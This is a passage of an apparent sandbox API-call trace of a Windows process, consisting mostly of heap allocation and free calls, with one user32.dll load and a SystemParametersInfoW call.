Flags=0x0, Size=0x20) returned 0x24b3c90 [0294.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0294.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0294.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0294.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0294.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0294.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0294.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0294.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0294.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0294.009] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0294.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0294.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0294.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0294.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0294.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0294.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0294.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0294.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0294.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0294.009] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0294.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0294.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0294.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0294.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0294.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0294.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0294.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0294.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0294.010] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0294.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0294.010] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0294.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0294.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0294.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0294.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0294.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0294.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0294.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0294.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0294.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0294.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0294.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0294.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0294.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0294.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0294.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0294.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0294.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0294.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0294.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0294.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0294.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0294.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0294.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0294.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0294.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0294.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0294.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0294.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0294.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0294.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0294.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0294.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0294.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0294.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0294.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0294.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0294.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0294.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0294.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0294.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0294.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0294.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0294.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0294.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0294.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0294.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0294.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0294.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0294.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0294.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0294.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0294.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0294.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0294.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0294.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0294.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0294.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0294.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0294.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0294.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0294.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0294.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0294.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0294.031] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0294.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0294.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0294.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0294.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0294.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0294.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0294.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0294.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0294.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0294.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0294.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0294.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0294.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0294.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0294.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0294.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0294.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0294.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0294.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0294.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0294.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0294.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0294.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0294.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0294.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0294.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0294.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0294.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0294.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0294.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0294.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0294.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0294.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0294.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0294.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0294.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0294.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0294.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0294.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0294.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0294.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0294.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0294.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0294.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0294.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0294.038] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0294.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0294.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0294.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0294.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0294.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2466e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0294.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0294.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0294.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0294.039] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0294.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0294.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0294.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0294.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0294.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0294.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0294.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0294.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0294.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0294.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0294.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0294.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0294.040] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0294.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0294.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0294.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0294.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0294.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0294.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0294.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0294.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0294.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0294.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0294.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0294.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0294.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0294.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0294.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0294.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0294.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0294.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0294.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0294.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0294.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0294.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0294.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0294.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0294.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0294.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0294.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0294.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0294.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0294.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0294.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0294.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0294.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0294.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0294.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0294.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0294.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0294.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0294.174] FreeLibrary (hLibModule=0x74f40000) returned 1 [0294.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0294.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0294.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0294.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0294.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0294.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0294.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0294.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0294.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0294.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0294.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0294.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0294.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0294.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0294.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0294.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0294.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0294.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0294.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0294.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0294.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0294.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0294.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0294.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0294.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0294.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0294.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0294.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0294.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0294.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0294.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0294.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0294.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0294.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: 